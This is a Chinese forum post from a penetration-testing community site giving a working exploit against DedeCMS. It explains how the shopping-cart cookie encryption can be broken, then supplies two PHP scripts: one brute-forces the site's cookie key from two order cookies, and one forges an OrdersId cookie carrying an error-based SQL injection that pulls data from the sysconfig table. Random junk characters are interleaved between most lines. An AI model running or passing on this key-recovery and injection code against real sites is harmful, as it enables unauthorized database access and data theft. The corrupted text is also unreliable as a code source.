中国网络渗透测试联盟
标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
[打印本页]
作者:
admin
时间:
2013-2-13 23:58
标题:
织梦CMS漏洞dedecms漏洞SQL注入漏洞
www.xxx.com/plus/search.php?keyword=
$ ~- w9 ~" w3 h0 q* Q+ T5 s" X! z
在 include/shopcar.class.php中
% T' H8 _2 H; }+ v
先看一下这个shopcar类是如何生成cookie的
7 I: c" U( {& y# w/ w/ n7 }: c
239 function saveCookie($key,$value)
( [, x5 ?4 R. X5 o' h9 G5 _$ F/ ^
240 {
7 W- e8 Q. i/ ^7 C/ L) X
241 if(is_array($value))
k8 `3 \- C" w# O
242 {
0 ?, P; F: u6 ?4 r3 f
243 $value = $this->enCrypt($this->enCode($value));
. }" c) Q2 r2 q: E/ R2 ~
244 }
3 j& A- M; g/ }5 M4 i! {. y
245 else
# X) E/ H4 o# d* ]+ e" ?) p
246 {
( T3 G& y9 F& B4 b2 u4 ]0 r9 K
247 $value = $this->enCrypt($value);
0 |2 N. M# `) C1 O. e9 ^, a2 B
248 }
: s) K- v/ u [5 m: c
249 setcookie($key,$value,time()+36000,’/');
. c( x# _$ n1 e9 H: x" j
250 }
1 {9 Z3 N( o3 O2 L5 R. c
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
2 @- |/ J E7 h4 X+ m. q6 C8 ?. T4 z( \
186 function enCrypt($txt)
: X: D% _ f0 N8 F+ ?! C; ?4 q( f9 Q
187 {
) r. ~3 ~" Y& X" b0 X" g6 Y) A
188 srand((double)microtime() * 1000000);
7 h# _+ r8 y4 H7 _9 U
189 $encrypt_key = md5(rand(0, 32000));
* W( E# g4 }& g0 A" I2 ~
190 $ctr = 0;
p/ [6 Z# W# \+ w: ?# K# V0 M
191 $tmp = ”;
% Q& u5 m2 q) v8 H5 x5 S
192 for($i = 0; $i < strlen($txt); $i++)
! [% u* Y) C3 k1 i+ e' X* }0 ^
193 {
% x1 D# k1 j; m9 ?, j
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
& g+ I; w. |0 ]$ @; e3 i7 ]
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
9 g4 Z& C; W& H( p' i4 ]- {
196 }
/ K" ^; U: ~' N3 A
197 return base64_encode($this->setKey($tmp));
7 o, C# `/ H% |4 ^
198 }
& R0 N0 j3 c$ O, P" s* s
213 function setKey($txt)
3 V9 r0 L! p. J; e' `1 a( R
214 {
) M ]: a5 e* U& M0 i8 s# R8 s
215 global $cfg_cookie_encode;
& i" B8 _! M1 H- r9 ~. N
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
/ B: s6 |2 e# [# D5 x
217 $ctr = 0;
" @& m$ E1 c( t: O0 O9 E
218 $tmp = ”;
; G7 {+ C& e' E: m) j, j0 Z) i% J
219 for($i = 0; $i < strlen($txt); $i++)
. S7 J( M: p" a Q2 L3 t0 N/ V
220 {
1 [/ I; c0 ^# O) f- j
221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$ w2 e, i1 n0 @9 v' q( X7 R l: H: \
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
- t- `$ D( f, F& C' u
223 }
$ _* E% U" v, q: W* U$ g
224 return $tmp;
% m# d. Y( N1 t, _
225 }
& k1 g8 S+ E% _. r9 Z+ F6 Q. N+ l
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
2 M+ B. T5 r" P5 b
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
. O$ G3 ]: U1 b3 @7 B1 Y
具体代码如下:
; q: G% V7 Q: J u z
<?php
- C! ?6 N3 h7 {6 {
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
; ^. T( F- B( d, N5 u
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
0 {! j1 n- F3 Y5 l
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
1 }; X$ J0 Y! @& Z
function reStrCode($code,$string)
+ t, u. p1 d% U8 z/ d
{
- G& H- {1 m' A& |0 T1 i
$code = base64_decode($code);
& |3 O$ f' h2 y% F
$key = “”;
) i8 _ d( D( d% Y1 |* ?/ c
for($i=0 ; $i<32 ; $i++)
' z4 {$ [* b h# W3 x6 Q* e6 d
{
9 N- Q8 @* G8 m _- d8 o
$key .= $string[$i] ^ $code[$i];
* f. O# S+ [3 ]( T$ S
}
% A f8 H) z' F* r2 f B. J
return $key;
7 L/ F( G3 r; I! H
}
+ K: P% y) _3 s* H- H
function getKeys($cookie,$plantxt)
& j# ]/ l4 U. k
{
' F6 W; a" o! c. N U6 D; h% P- w* c
$tmp = $cookie;
5 g9 G- b4 Q( z
$results = array();
" R/ x) A- C! P: Q7 A8 g. n
for($j=0 ; $j < 32000; $j++)
- P1 s7 V9 n- V
{
% K, u$ t' |3 }$ M
^8 |6 W9 `) C# ]" R) r
$txt = $plantxt;
9 j% ^) l/ }0 s4 i
$ctr = 0;
% ^ o/ e u* { [
$tmp = ”;
n$ ]/ [, p& d5 o* y
$encrypt_key = md5($j);
1 u* ?2 ]% ?0 d: l8 }( C
for($i =0; $i < strlen($txt); $i ++)
; I! U$ _7 x5 `* D4 z! P
{
7 h, n. W: B: `4 [* }
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
/ d$ a+ | r. H' A8 M' A" Q
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
8 h4 e, o1 r% m' l6 a
}
' S4 W# v' G, u) n2 C
$string = $tmp;
+ Z: @9 q2 ^: X7 f
$code = $cookie;
/ d. G G7 ~, z2 ?& b X! e' F
$result = reStrCode($code,$string);
- [" g# u) C& k4 K
if(eregi(‘^[a-z0-9]+$’,$result))
$ r5 o( a( s1 w, g9 m0 P
{
0 x3 D* N7 x1 [$ D; o
echo $result.”\n”;
- R% i/ S" [8 j0 X: v$ V6 C
$results[] = $result;
2 w" c6 n% W2 |# ?: ?
}
5 |! N& Q0 ^& D/ Q0 V/ {! y+ ~
}
: d: l5 k3 q# F5 S: [: l
return $results;
, t3 N! i/ l+ D9 p
}
3 B1 U9 z$ M+ N% m& a& @
$results1 = getKeys($cookie1,$plantxt);
R. A% X; {" m
$results2 = getKeys($cookie2,$plantxt);
+ A: G) F, ~4 }+ p
print “\n——————–real key————————–\n”;
d6 _) p+ A+ c' r% q8 ?% C" r X& A2 S
foreach($results1 as $test1)
: \* u9 X. A2 M2 g4 ~3 s
{
3 |$ {/ S1 ^8 x# g; \; _6 C
foreach($results2 as $test2)
1 ?6 {! p) R/ d/ s3 a5 f" g
{
# @/ M: Y1 ]% C
if($test1 == $test2)
" a* c% @7 R7 e- i/ ?
{
8 I. J: `. R9 q1 y
echo $test1.”\n”;
4 n: ? R' x: E( x* H6 g% k) f
}
9 B- `* Z) j* U) v( J( V, F
}
% g- w4 Z) n) V% V9 [! B
}
: d& ~- J7 r, `/ ]% |4 L; E: o5 k
?>
5 n+ s P0 p$ c4 H8 r5 B, x* l* S
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
& _6 Z( R* A% T3 q% m: K1 N2 K
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
1 k s3 y# ?% z6 O% ]0 r( \: D
然后推算出md5(strtolower($cfg_cookie_encode))
5 R8 d% L6 `" b; t' Z0 I
得到这个key之后,我们就可以构造任意购物车的cookie
/ Z7 T& @' ~9 F' o" M4 o1 g* X
接着看
: L" @ O0 U' T) v4 @1 Y2 M1 L
20 class MemberShops
9 s" B* |6 [, w3 Q
21 {
/ U8 L* u4 ]: _- [5 T
22 var $OrdersId;
- H' l5 S& b# o1 M5 Z. K/ ?
23 var $productsId;
, {6 @9 J5 k2 w( o( v: G! c
24
5 a; t, f: E' H% f
25 function __construct()
7 X9 Q9 Z' ? j2 K
26 {
; b6 \( f* j5 D
27 $this->OrdersId = $this->getCookie(“OrdersId”);
, H9 _$ X7 ^ l7 L7 \2 Y; r
28 if(empty($this->OrdersId))
* _) G8 O) S0 v1 i. d8 |6 a
29 {
2 T3 |2 B0 E' J$ |2 l! E4 E) k
30 $this->OrdersId = $this->MakeOrders();
9 c+ {4 G1 f4 J$ l1 s# M
31 }
/ C/ s8 l( N8 Z8 G+ _
32 }
; V# c0 T$ q7 k/ t
发现OrderId是从cookie里面获取的
9 E. d5 ^( X/ f1 N0 w
然后
) B9 N+ J6 H( J
/plus/carbuyaction.php中的
* X/ p: `& B9 e' E
29 $cart = new MemberShops();
: p: O# R8 o' @% r: ?
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
* m5 i! Q$ L, l# q
……
. K( x5 r4 ^! b* ?, u% q
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
; j$ d5 L! I1 h- x5 ~8 n* C* p( E
接着我们就可以注入了
8 E% N7 r) M: s% [; q3 U
通过利用下面代码生成cookie:
* i6 k1 S) H0 ?! b
<?php
# J4 b: N- c& F- ?% I
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
' d, o' ?* X' ~" X1 h$ R
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
( m @# W: H' r9 V! ]
function setKey($txt)
! u( W5 C6 g5 W$ A# n3 c1 |" g
{
' R0 ~( f) C' c% ~
global $encrypt_key;
6 B' l2 t9 O% K2 n0 `
$ctr = 0;
5 v3 O9 s0 n4 ]- S4 a
$tmp = ”;
; c0 a/ G& s( {. H% u3 Y% l# c
for($i = 0; $i < strlen($txt); $i++)
& W# D" ^: ?# A& r% P" p
{
9 u* ^/ a! P$ P) }3 G% P
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
! U1 I! i3 M. {- Q; `5 |% \0 O
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
! C; B$ f4 a4 k9 V4 ^
}
9 N9 G6 @# ^5 d+ T" o$ T' o: ^% L
return $tmp;
! i, [0 Y- ^7 I' {4 z
}
4 h. V% H' K; k; @+ U( m
function enCrypt($txt)
* S( } O/ n" d" V* X5 Z' G
{
3 z: Q6 q% f+ Q+ G
srand((double)microtime() * 1000000);
- Z9 n% f, T$ ?7 T
$encrypt_key = md5(rand(0, 32000));
- a5 w1 j6 @: q# ^
$ctr = 0;
4 F* x7 K; |/ _ T+ |) J2 ]+ d; \* j
$tmp = ”;
5 S& G& w1 C+ k- u
for($i = 0; $i < strlen($txt); $i++)
, x- l. d. T8 C6 N7 L, F' B
{
. E& z; ~ {; E% H$ d3 G
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
# v; O: ^6 l1 w5 O) C8 X; y
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
( J/ ` V' A8 `9 n+ y6 f+ {
}
+ s3 ]# i& B- ?' ~8 F7 _8 C
return base64_encode(setKey($tmp));
$ n& V2 E/ N2 V0 D- t
}
. `* x( L( D* p7 {, e
for($dest =0;$dest = enCrypt($txt);)
% M6 a) O2 z- B- e
{
0 p* x* {* L2 F& \
if(!strpos($dest,’+'))
l# p" q, u8 {1 X
{
' o* T% a: v1 H3 A( N& I% ?
break;
# x+ O1 C: N: T. {& M9 h1 L
}
$ S* Z% D' p5 F& F2 I1 S3 d! l
}
* F# l7 m5 K9 x
echo $dest.”\n”;
+ G+ s* R- f) ~3 n$ W, u' F8 I/ `
?>
9 e1 P2 F& z0 c" E
1 A% z+ E& _9 I7 Y: Z: E c
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2